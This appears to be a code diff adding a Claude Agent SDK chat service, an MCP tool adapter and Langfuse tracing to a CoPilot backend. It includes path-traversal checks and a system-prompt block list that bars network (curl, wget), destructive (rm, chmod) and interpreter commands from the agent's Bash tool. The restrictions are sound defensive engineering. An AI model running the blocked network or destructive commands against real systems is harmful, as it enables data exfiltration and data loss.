"workspace_read", {"path": "src/main.py"}, user_id="user-1"
)
assert result == {}
def test_non_workspace_tool_passes_isolation():
result = _validate_user_isolation(
"find_agent", {"query": "email"}, user_id="user-1"
)
assert result == {}

View File

@@ -0,0 +1,556 @@
"""Claude Agent SDK service layer for CoPilot chat completions."""
import asyncio
import json
import logging
import os
import re
import uuid
from collections.abc import AsyncGenerator
from typing import Any
from backend.util.exceptions import NotFoundError
from ..config import ChatConfig
from ..model import (
ChatMessage,
ChatSession,
Usage,
get_chat_session,
update_session_title,
upsert_chat_session,
)
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamStart,
StreamTextDelta,
StreamToolInputAvailable,
StreamToolOutputAvailable,
StreamUsage,
)
from ..service import _build_system_prompt, _generate_session_title
from ..tracking import track_user_message
from .anthropic_fallback import stream_with_anthropic
from .response_adapter import SDKResponseAdapter
from .security_hooks import create_security_hooks
from .tool_adapter import (
COPILOT_TOOL_NAMES,
create_copilot_mcp_server,
set_execution_context,
)
from .tracing import TracedSession, create_tracing_hooks, merge_hooks
logger = logging.getLogger(__name__)
config = ChatConfig()
# Set to hold background tasks to prevent garbage collection
_background_tasks: set[asyncio.Task[Any]] = set()
_SDK_CWD_PREFIX = "/tmp/copilot-"
# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """
## Bash restrictions
The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""
def _resolve_sdk_model() -> str | None:
"""Resolve the model name for the Claude Agent SDK CLI.
Uses ``config.claude_agent_model`` if set, otherwise derives from
``config.model`` by stripping the OpenRouter provider prefix (e.g.,
``"anthropic/claude-opus-4.6"`` → ``"claude-opus-4.6"``).
"""
if config.claude_agent_model:
return config.claude_agent_model
model = config.model
if "/" in model:
return model.split("/", 1)[1]
return model
def _build_sdk_env() -> dict[str, str]:
"""Build env vars for the SDK CLI process.
Routes API calls through OpenRouter (or a custom base_url) using
the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
This gives per-call token and cost tracking on the OpenRouter dashboard.
Only overrides ``ANTHROPIC_API_KEY`` when a valid proxy URL and auth
token are both present — otherwise returns an empty dict so the SDK
falls back to its default credentials.
"""
env: dict[str, str] = {}
if config.api_key and config.base_url:
# Strip /v1 suffix — SDK expects the base URL without a version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
if not base or not base.startswith("http"):
# Invalid base_url — don't override SDK defaults
return env
env["ANTHROPIC_BASE_URL"] = base
env["ANTHROPIC_AUTH_TOKEN"] = config.api_key
# Must be explicitly empty so the CLI uses AUTH_TOKEN instead
env["ANTHROPIC_API_KEY"] = ""
return env
def _make_sdk_cwd(session_id: str) -> str:
"""Create a safe, session-specific working directory path.
Sanitizes session_id, then validates the resulting path stays under /tmp/
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
"""
# Step 1: Sanitize - only allow alphanumeric and hyphens
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
if not safe_id:
raise ValueError("Session ID is empty after sanitization")
# Step 2: Construct path with known-safe prefix
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
# Step 3: Validate the path is still under our prefix (prevent traversal)
if not cwd.startswith(_SDK_CWD_PREFIX):
raise ValueError(f"Session path escaped prefix: {cwd}")
# Step 4: Additional assertion for defense-in-depth
assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
return cwd
def _cleanup_sdk_tool_results(cwd: str) -> None:
"""Remove SDK tool-result files for a specific session working directory.
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
We clean only the specific cwd's results to avoid race conditions between
concurrent sessions.
Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
"""
import shutil
# Security check 1: Validate cwd is under the expected prefix
normalized = os.path.normpath(cwd)
if not normalized.startswith(_SDK_CWD_PREFIX):
logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
return
# Security check 2: Ensure no path traversal in the normalized path
if ".." in normalized:
logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
return
# SDK encodes the cwd path by replacing '/' with '-'
encoded_cwd = normalized.replace("/", "-")
# Construct the project directory path (known-safe home expansion)
claude_projects = os.path.expanduser("~/.claude/projects")
project_dir = os.path.join(claude_projects, encoded_cwd)
# Security check 3: Validate project_dir is under ~/.claude/projects
project_dir = os.path.normpath(project_dir)
if not project_dir.startswith(claude_projects):
logger.warning(
f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
)
return
results_dir = os.path.join(project_dir, "tool-results")
if os.path.isdir(results_dir):
for filename in os.listdir(results_dir):
file_path = os.path.join(results_dir, filename)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except OSError:
pass
# Also clean up the temp cwd directory itself
try:
shutil.rmtree(normalized, ignore_errors=True)
except OSError:
pass
async def _compress_conversation_history(
session: ChatSession,
) -> list[ChatMessage]:
"""Compress prior conversation messages if they exceed the token threshold.
Uses the shared compress_context() from prompt.py which supports:
- LLM summarization of old messages (keeps recent ones intact)
- Progressive content truncation as fallback
- Middle-out deletion as last resort
Returns the compressed prior messages (everything except the current message).
"""
prior = session.messages[:-1]
if len(prior) < 2:
return prior
from backend.util.prompt import compress_context
# Convert ChatMessages to dicts for compress_context
messages_dict = []
for msg in prior:
msg_dict: dict[str, Any] = {"role": msg.role}
if msg.content:
msg_dict["content"] = msg.content
if msg.tool_calls:
msg_dict["tool_calls"] = msg.tool_calls
if msg.tool_call_id:
msg_dict["tool_call_id"] = msg.tool_call_id
messages_dict.append(msg_dict)
try:
import openai
async with openai.AsyncOpenAI(
api_key=config.api_key, base_url=config.base_url, timeout=30.0
) as client:
result = await compress_context(
messages=messages_dict,
model=config.model,
client=client,
)
except Exception as e:
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
# Fall back to truncation-only (no LLM summarization)
result = await compress_context(
messages=messages_dict,
model=config.model,
client=None,
)
if result.was_compacted:
logger.info(
f"[SDK] Context compacted: {result.original_token_count} -> "
f"{result.token_count} tokens "
f"({result.messages_summarized} summarized, "
f"{result.messages_dropped} dropped)"
)
# Convert compressed dicts back to ChatMessages
return [
ChatMessage(
role=m["role"],
content=m.get("content"),
tool_calls=m.get("tool_calls"),
tool_call_id=m.get("tool_call_id"),
)
for m in result.messages
]
return prior
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
"""Format conversation messages into a context prefix for the user message.
Returns a string like:
<conversation_history>
User: hello
You responded: Hi! How can I help?
</conversation_history>
Returns None if there are no messages to format.
"""
if not messages:
return None
lines: list[str] = []
for msg in messages:
if not msg.content:
continue
if msg.role == "user":
lines.append(f"User: {msg.content}")
elif msg.role == "assistant":
lines.append(f"You responded: {msg.content}")
# Skip tool messages — they're internal details
if not lines:
return None
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
async def stream_chat_completion_sdk(
session_id: str,
message: str | None = None,
tool_call_response: str | None = None, # noqa: ARG001
is_user_message: bool = True,
user_id: str | None = None,
retry_count: int = 0, # noqa: ARG001
session: ChatSession | None = None,
context: dict[str, str] | None = None, # noqa: ARG001
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream chat completion using Claude Agent SDK.
Drop-in replacement for stream_chat_completion with improved reliability.
"""
if session is None:
session = await get_chat_session(session_id, user_id)
if not session:
raise NotFoundError(
f"Session {session_id} not found. Please create a new session first."
)
if message:
session.messages.append(
ChatMessage(
role="user" if is_user_message else "assistant", content=message
)
)
if is_user_message:
track_user_message(
user_id=user_id, session_id=session_id, message_length=len(message)
)
session = await upsert_chat_session(session)
# Generate title for new sessions (first user message)
if is_user_message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
if len(user_messages) == 1:
first_message = user_messages[0].content or message or ""
if first_message:
task = asyncio.create_task(
_update_title_async(session_id, first_message, user_id)
)
_background_tasks.add(task)
task.add_done_callback(_background_tasks.discard)
# Build system prompt (reuses non-SDK path with Langfuse support)
has_history = len(session.messages) > 1
system_prompt, _ = await _build_system_prompt(
user_id, has_conversation_history=has_history
)
system_prompt += _SDK_TOOL_SUPPLEMENT
message_id = str(uuid.uuid4())
text_block_id = str(uuid.uuid4())
task_id = str(uuid.uuid4())
yield StreamStart(messageId=message_id, taskId=task_id)
stream_completed = False
# Use a session-specific temp dir to avoid cleanup race conditions
# between concurrent sessions.
sdk_cwd = _make_sdk_cwd(session_id)
os.makedirs(sdk_cwd, exist_ok=True)
set_execution_context(user_id, session, None)
try:
try:
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
mcp_server = create_copilot_mcp_server()
sdk_model = _resolve_sdk_model()
# Initialize Langfuse tracing (no-op if not configured)
tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
# Merge security hooks with optional tracing hooks
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
tracing_hooks = create_tracing_hooks(tracer)
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
options = ClaudeAgentOptions(
system_prompt=system_prompt,
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
allowed_tools=COPILOT_TOOL_NAMES,
hooks=combined_hooks, # type: ignore[arg-type]
cwd=sdk_cwd,
max_buffer_size=config.claude_agent_max_buffer_size,
model=sdk_model,
env=_build_sdk_env(),
user=user_id or None,
max_budget_usd=config.claude_agent_max_budget_usd,
)
adapter = SDKResponseAdapter(message_id=message_id)
adapter.set_task_id(task_id)
async with tracer, ClaudeSDKClient(options=options) as client:
current_message = message or ""
if not current_message and session.messages:
last_user = [m for m in session.messages if m.role == "user"]
if last_user:
current_message = last_user[-1].content or ""
if not current_message.strip():
yield StreamError(
errorText="Message cannot be empty.",
code="empty_prompt",
)
yield StreamFinish()
return
# Build query with conversation history context.
# Compress history first to handle long conversations.
query_message = current_message
if len(session.messages) > 1:
compressed = await _compress_conversation_history(session)
history_context = _format_conversation_context(compressed)
if history_context:
query_message = (
f"{history_context}\n\n"
f"Now, the user says:\n{current_message}"
)
logger.info(
f"[SDK] Sending query: {current_message[:80]!r}"
f" ({len(session.messages)} msgs in session)"
)
tracer.log_user_message(current_message)
await client.query(query_message, session_id=session_id)
assistant_response = ChatMessage(role="assistant", content="")
accumulated_tool_calls: list[dict[str, Any]] = []
has_appended_assistant = False
has_tool_results = False
async for sdk_msg in client.receive_messages():
logger.debug(
f"[SDK] Received: {type(sdk_msg).__name__} "
f"{getattr(sdk_msg, 'subtype', '')}"
)
tracer.log_sdk_message(sdk_msg)
for response in adapter.convert_message(sdk_msg):
if isinstance(response, StreamStart):
continue
yield response
if isinstance(response, StreamTextDelta):
delta = response.delta or ""
# After tool results, start a new assistant
# message for the post-tool text.
if has_tool_results and has_appended_assistant:
assistant_response = ChatMessage(
role="assistant", content=delta
)
accumulated_tool_calls = []
has_appended_assistant = False
has_tool_results = False
session.messages.append(assistant_response)
has_appended_assistant = True
else:
assistant_response.content = (
assistant_response.content or ""
) + delta
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolInputAvailable):
accumulated_tool_calls.append(
{
"id": response.toolCallId,
"type": "function",
"function": {
"name": response.toolName,
"arguments": json.dumps(response.input or {}),
},
}
)
assistant_response.tool_calls = accumulated_tool_calls
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolOutputAvailable):
session.messages.append(
ChatMessage(
role="tool",
content=(
response.output
if isinstance(response.output, str)
else str(response.output)
),
tool_call_id=response.toolCallId,
)
)
has_tool_results = True
elif isinstance(response, StreamUsage):
session.usage.append(
Usage(
prompt_tokens=response.promptTokens,
completion_tokens=response.completionTokens,
total_tokens=response.totalTokens,
)
)
elif isinstance(response, StreamFinish):
stream_completed = True
if stream_completed:
break
if (
assistant_response.content or assistant_response.tool_calls
) and not has_appended_assistant:
session.messages.append(assistant_response)
except ImportError:
logger.warning(
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
)
async for response in stream_with_anthropic(
session, system_prompt, text_block_id
):
if isinstance(response, StreamFinish):
stream_completed = True
yield response
await upsert_chat_session(session)
logger.debug(
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
)
if not stream_completed:
yield StreamFinish()
except Exception as e:
logger.error(f"[SDK] Error: {e}", exc_info=True)
try:
await upsert_chat_session(session)
except Exception as save_err:
logger.error(f"[SDK] Failed to save session on error: {save_err}")
yield StreamError(
errorText="An error occurred. Please try again.",
code="sdk_error",
)
yield StreamFinish()
finally:
_cleanup_sdk_tool_results(sdk_cwd)
async def _update_title_async(
session_id: str, message: str, user_id: str | None = None
) -> None:
"""Background task to update session title."""
try:
title = await _generate_session_title(
message, user_id=user_id, session_id=session_id
)
if title:
await update_session_title(session_id, title)
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
except Exception as e:
logger.warning(f"[SDK] Failed to update session title: {e}")

View File

@@ -0,0 +1,321 @@
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
This module provides the adapter layer that converts existing BaseTool implementations
into in-process MCP tools that can be used with the Claude Agent SDK.
"""
import json
import logging
import os
import uuid
from contextvars import ContextVar
from typing import Any
from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools import TOOL_REGISTRY
from backend.api.features.chat.tools.base import BaseTool
logger = logging.getLogger(__name__)
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
MCP_SERVER_NAME = "copilot"
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
# Context variables to pass user/session info to tool execution
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
_current_session: ContextVar[ChatSession | None] = ContextVar(
"current_session", default=None
)
_current_tool_call_id: ContextVar[str | None] = ContextVar(
"current_tool_call_id", default=None
)
# Stash for MCP tool outputs before the SDK potentially truncates them.
# Keyed by tool_name → full output string. Consumed (popped) by the
# response adapter when it builds StreamToolOutputAvailable.
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
"pending_tool_outputs", default=None # type: ignore[arg-type]
)
def set_execution_context(
user_id: str | None,
session: ChatSession,
tool_call_id: str | None = None,
) -> None:
"""Set the execution context for tool calls.
This must be called before streaming begins to ensure tools have access
to user_id and session information.
"""
_current_user_id.set(user_id)
_current_session.set(session)
_current_tool_call_id.set(tool_call_id)
_pending_tool_outputs.set({})
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
"""Get the current execution context."""
return (
_current_user_id.get(),
_current_session.get(),
_current_tool_call_id.get(),
)
def pop_pending_tool_output(tool_name: str) -> str | None:
"""Pop and return the stashed full output for *tool_name*.
The SDK CLI may truncate large tool results (writing them to disk and
replacing the content with a file reference). This stash keeps the
original MCP output so the response adapter can forward it to the
frontend for proper widget rendering.
Returns ``None`` if nothing was stashed for *tool_name*.
"""
pending = _pending_tool_outputs.get(None)
if pending is None:
return None
return pending.pop(tool_name, None)
def create_tool_handler(base_tool: BaseTool):
"""Create an async handler function for a BaseTool.
This wraps the existing BaseTool._execute method to be compatible
with the Claude Agent SDK MCP tool format.
"""
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Execute the wrapped tool and return MCP-formatted response."""
user_id, session, tool_call_id = get_execution_context()
if session is None:
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": "No session context available",
"type": "error",
}
),
}
],
"isError": True,
}
try:
# Call the existing tool's execute method
# Generate unique tool_call_id per invocation for proper correlation
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
result = await base_tool.execute(
user_id=user_id,
session=session,
tool_call_id=effective_id,
**args,
)
# The result is a StreamToolOutputAvailable, extract the output
text = (
result.output
if isinstance(result.output, str)
else json.dumps(result.output)
)
# Stash the full output before the SDK potentially truncates it.
# The response adapter will pop this for frontend widget rendering.
pending = _pending_tool_outputs.get(None)
if pending is not None:
pending[base_tool.name] = text
return {
"content": [{"type": "text", "text": text}],
"isError": not result.success,
}
except Exception as e:
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": str(e),
"type": "error",
"message": f"Failed to execute {base_tool.name}",
}
),
}
],
"isError": True,
}
return tool_handler
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
"""Build a JSON Schema input schema for a tool."""
return {
"type": "object",
"properties": base_tool.parameters.get("properties", {}),
"required": base_tool.parameters.get("required", []),
}
def get_tool_definitions() -> list[dict[str, Any]]:
"""Get all tool definitions in MCP format.
Returns a list of tool definitions that can be used with
create_sdk_mcp_server or as raw tool definitions.
"""
tool_definitions = []
for tool_name, base_tool in TOOL_REGISTRY.items():
tool_def = {
"name": tool_name,
"description": base_tool.description,
"inputSchema": _build_input_schema(base_tool),
}
tool_definitions.append(tool_def)
return tool_definitions
def get_tool_handlers() -> dict[str, Any]:
"""Get all tool handlers mapped by name.
Returns a dictionary mapping tool names to their handler functions.
"""
handlers = {}
for tool_name, base_tool in TOOL_REGISTRY.items():
handlers[tool_name] = create_tool_handler(base_tool)
return handlers
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Read a file with optional offset/limit. Restricted to SDK working directory.
After reading, the file is deleted to prevent accumulation in long-running pods.
"""
file_path = args.get("file_path", "")
offset = args.get("offset", 0)
limit = args.get("limit", 2000)
# Security: only allow reads under the SDK's working directory
real_path = os.path.realpath(file_path)
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
return {
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
"isError": True,
}
try:
with open(real_path) as f:
lines = f.readlines()
selected = lines[offset : offset + limit]
content = "".join(selected)
return {"content": [{"type": "text", "text": content}], "isError": False}
except FileNotFoundError:
return {
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
"isError": True,
}
except Exception as e:
return {
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
"isError": True,
}
_READ_TOOL_NAME = "Read"
_READ_TOOL_DESCRIPTION = (
"Read a file from the local filesystem. "
"Use offset and limit to read specific line ranges for large files."
)
_READ_TOOL_SCHEMA = {
"type": "object",
"properties": {
"file_path": {
"type": "string",
"description": "The absolute path to the file to read",
},
"offset": {
"type": "integer",
"description": "Line number to start reading from (0-indexed). Default: 0",
},
"limit": {
"type": "integer",
"description": "Number of lines to read. Default: 2000",
},
},
"required": ["file_path"],
}
# Create the MCP server configuration
def create_copilot_mcp_server():
"""Create an in-process MCP server configuration for CoPilot tools.
This can be passed to ClaudeAgentOptions.mcp_servers.
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
package being available. This function returns the configuration that
can be used with the SDK.
"""
try:
from claude_agent_sdk import create_sdk_mcp_server, tool
# Create decorated tool functions
sdk_tools = []
for tool_name, base_tool in TOOL_REGISTRY.items():
handler = create_tool_handler(base_tool)
decorated = tool(
tool_name,
base_tool.description,
_build_input_schema(base_tool),
)(handler)
sdk_tools.append(decorated)
# Add the Read tool so the SDK can read back oversized tool results
read_tool = tool(
_READ_TOOL_NAME,
_READ_TOOL_DESCRIPTION,
_READ_TOOL_SCHEMA,
)(_read_file_handler)
sdk_tools.append(read_tool)
server = create_sdk_mcp_server(
name=MCP_SERVER_NAME,
version="1.0.0",
tools=sdk_tools,
)
return server
except ImportError:
# Let ImportError propagate so service.py handles the fallback
raise
# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
# List of tool names for allowed_tools configuration
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
*_SDK_BUILTIN_TOOLS,
]

View File

@@ -0,0 +1,429 @@
"""Langfuse tracing integration for Claude Agent SDK.
This module provides modular, non-invasive observability for SDK sessions.
All tracing is opt-in (only active when Langfuse credentials are configured)
and designed to not affect the core execution flow.
Usage:
async with TracedSession(session_id, user_id) as tracer:
# Your SDK code here
tracer.log_user_message(message)
async for sdk_msg in client.receive_messages():
tracer.log_sdk_message(sdk_msg)
tracer.log_result(result_message)
"""
from __future__ import annotations
import logging
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any
from backend.util.settings import Settings
if TYPE_CHECKING:
from claude_agent_sdk import Message, ResultMessage
logger = logging.getLogger(__name__)
settings = Settings()
def _is_langfuse_configured() -> bool:
"""Check if Langfuse credentials are configured."""
return bool(
settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
)
@dataclass
class ToolSpan:
"""Tracks a single tool call for tracing."""
tool_call_id: str
tool_name: str
input: dict[str, Any]
start_time: float = field(default_factory=time.perf_counter)
output: str | None = None
success: bool = True
end_time: float | None = None
@dataclass
class GenerationSpan:
"""Tracks an LLM generation (text output) for tracing."""
text: str = ""
start_time: float = field(default_factory=time.perf_counter)
end_time: float | None = None
tool_calls: list[ToolSpan] = field(default_factory=list)
class TracedSession:
"""Context manager for tracing a Claude Agent SDK session with Langfuse.
Automatically creates a trace with:
- Session-level metadata (user_id, session_id)
- Generation spans for LLM outputs
- Tool call spans with input/output
- Token usage and cost (from ResultMessage)
If Langfuse is not configured, all methods are no-ops.
"""
def __init__(
self,
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
self.session_id = session_id
self.user_id = user_id
self.system_prompt = system_prompt
self.model = model
self.enabled = _is_langfuse_configured()
# Internal state
self._trace: Any = None
self._langfuse: Any = None
self._user_message: str | None = None
self._generations: list[GenerationSpan] = []
self._current_generation: GenerationSpan | None = None
self._pending_tools: dict[str, ToolSpan] = {}
self._start_time: float = 0
async def __aenter__(self) -> TracedSession:
"""Start the trace."""
if not self.enabled:
return self
try:
from langfuse import get_client
self._langfuse = get_client()
self._start_time = time.perf_counter()
# Create the root trace
self._trace = self._langfuse.trace(
name="copilot-sdk-session",
session_id=self.session_id,
user_id=self.user_id,
metadata={
"sdk": "claude-agent-sdk",
"has_system_prompt": bool(self.system_prompt),
},
)
logger.debug(f"[Tracing] Started trace for session {self.session_id}")
except Exception as e:
logger.warning(f"[Tracing] Failed to start trace: {e}")
self.enabled = False
return self
async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
"""End the trace and flush to Langfuse."""
if not self.enabled or not self._trace:
return
try:
# Finalize any open generation
self._finalize_current_generation()
# Add generations as spans
for gen in self._generations:
self._trace.span(
name="llm-generation",
start_time=gen.start_time,
end_time=gen.end_time or time.perf_counter(),
output=gen.text[:1000] if gen.text else None, # Truncate
metadata={"tool_calls": len(gen.tool_calls)},
)
# Add tool calls as nested spans
for tool in gen.tool_calls:
self._trace.span(
name=f"tool:{tool.tool_name}",
start_time=tool.start_time,
end_time=tool.end_time or time.perf_counter(),
input=tool.input,
output=tool.output[:500] if tool.output else None,
metadata={
"tool_call_id": tool.tool_call_id,
"success": tool.success,
},
)
# Update trace with final status
status = "error" if exc_type else "success"
self._trace.update(
output=self._generations[-1].text[:500] if self._generations else None,
metadata={"status": status, "num_generations": len(self._generations)},
)
# Flush asynchronously (Langfuse handles this in background)
logger.debug(
f"[Tracing] Completed trace for session {self.session_id}, "
f"{len(self._generations)} generations"
)
except Exception as e:
logger.warning(f"[Tracing] Failed to finalize trace: {e}")
def log_user_message(self, message: str) -> None:
"""Log the user's input message."""
if not self.enabled or not self._trace:
return
self._user_message = message
try:
self._trace.update(input=message[:1000])
except Exception as e:
logger.debug(f"[Tracing] Failed to log user message: {e}")
def log_sdk_message(self, sdk_message: Message) -> None:
"""Log an SDK message (automatically categorizes by type)."""
if not self.enabled:
return
try:
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
if isinstance(sdk_message, AssistantMessage):
# Start a new generation if needed
if self._current_generation is None:
self._current_generation = GenerationSpan()
self._generations.append(self._current_generation)
for block in sdk_message.content:
if isinstance(block, TextBlock) and block.text:
self._current_generation.text += block.text
elif isinstance(block, ToolUseBlock):
tool_span = ToolSpan(
tool_call_id=block.id,
tool_name=block.name,
input=block.input or {},
)
self._pending_tools[block.id] = tool_span
if self._current_generation:
self._current_generation.tool_calls.append(tool_span)
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_span = self._pending_tools.get(block.tool_use_id)
if tool_span:
tool_span.end_time = time.perf_counter()
tool_span.success = not (block.is_error or False)
tool_span.output = self._extract_tool_output(block.content)
# After tool results, finalize current generation
# (SDK will start a new AssistantMessage for continuation)
self._finalize_current_generation()
elif isinstance(sdk_message, ResultMessage):
self._log_result(sdk_message)
except Exception as e:
logger.debug(f"[Tracing] Failed to log SDK message: {e}")
def _log_result(self, result: ResultMessage) -> None:
"""Log the final result with usage and cost."""
if not self.enabled or not self._trace:
return
try:
# Extract usage info
usage = result.usage or {}
metadata: dict[str, Any] = {
"duration_ms": result.duration_ms,
"duration_api_ms": result.duration_api_ms,
"num_turns": result.num_turns,
"is_error": result.is_error,
}
if result.total_cost_usd is not None:
metadata["cost_usd"] = result.total_cost_usd
if usage:
metadata["usage"] = usage
self._trace.update(metadata=metadata)
# Log as a generation for proper Langfuse cost/usage tracking
if usage or result.total_cost_usd:
self._trace.generation(
name="claude-sdk-completion",
model=self.model or "claude-sonnet-4-20250514",
usage=(
{
"input": usage.get("input_tokens", 0),
"output": usage.get("output_tokens", 0),
"total": usage.get("input_tokens", 0)
+ usage.get("output_tokens", 0),
}
if usage
else None
),
metadata={"cost_usd": result.total_cost_usd},
)
logger.debug(
f"[Tracing] Logged result: {result.num_turns} turns, "
f"${result.total_cost_usd:.4f} cost"
if result.total_cost_usd
else f"[Tracing] Logged result: {result.num_turns} turns"
)
except Exception as e:
logger.debug(f"[Tracing] Failed to log result: {e}")
def _finalize_current_generation(self) -> None:
"""Mark the current generation as complete."""
if self._current_generation:
self._current_generation.end_time = time.perf_counter()
self._current_generation = None
@staticmethod
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract string output from tool result content."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [
item.get("text", "") for item in content if item.get("type") == "text"
]
return "".join(parts) if parts else str(content)
return str(content) if content else ""
@asynccontextmanager
async def traced_session(
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
"""Convenience async context manager for tracing SDK sessions.
Usage:
async with traced_session(session_id, user_id) as tracer:
tracer.log_user_message(message)
async for msg in client.receive_messages():
tracer.log_sdk_message(msg)
"""
tracer = TracedSession(session_id, user_id, system_prompt, model=model)
async with tracer:
yield tracer
def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
"""Create SDK hooks for fine-grained Langfuse tracing.
These hooks capture precise timing for tool executions and failures
that may not be visible in the message stream.
Designed to be merged with security hooks:
hooks = {**security_hooks, **create_tracing_hooks(tracer)}
Args:
tracer: The active TracedSession instance
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
if not tracer.enabled:
return {}
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def trace_pre_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool start time for accurate duration tracking."""
_ = context
if not tool_use_id:
return {}
tool_name = str(input_data.get("tool_name", "unknown"))
tool_input = input_data.get("tool_input", {})
# Record start time in pending tools
tracer._pending_tools[tool_use_id] = ToolSpan(
tool_call_id=tool_use_id,
tool_name=tool_name,
input=tool_input if isinstance(tool_input, dict) else {},
)
return {}
async def trace_post_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool completion for duration calculation."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = True
return {}
async def trace_post_tool_failure(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool failures for error tracking."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = False
error = input_data.get("error", "Unknown error")
tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
return {}
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
],
}
except ImportError:
logger.debug("[Tracing] SDK not available for hook-based tracing")
return {}
def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
"""Merge multiple hook configurations into one.
Combines hook matchers for the same event type, allowing both
security and tracing hooks to coexist.
Usage:
combined = merge_hooks(security_hooks, tracing_hooks)
"""
result: dict[str, list[Any]] = {}
for hook_dict in hook_dicts:
for event_name, matchers in hook_dict.items():
if event_name not in result:
result[event_name] = []
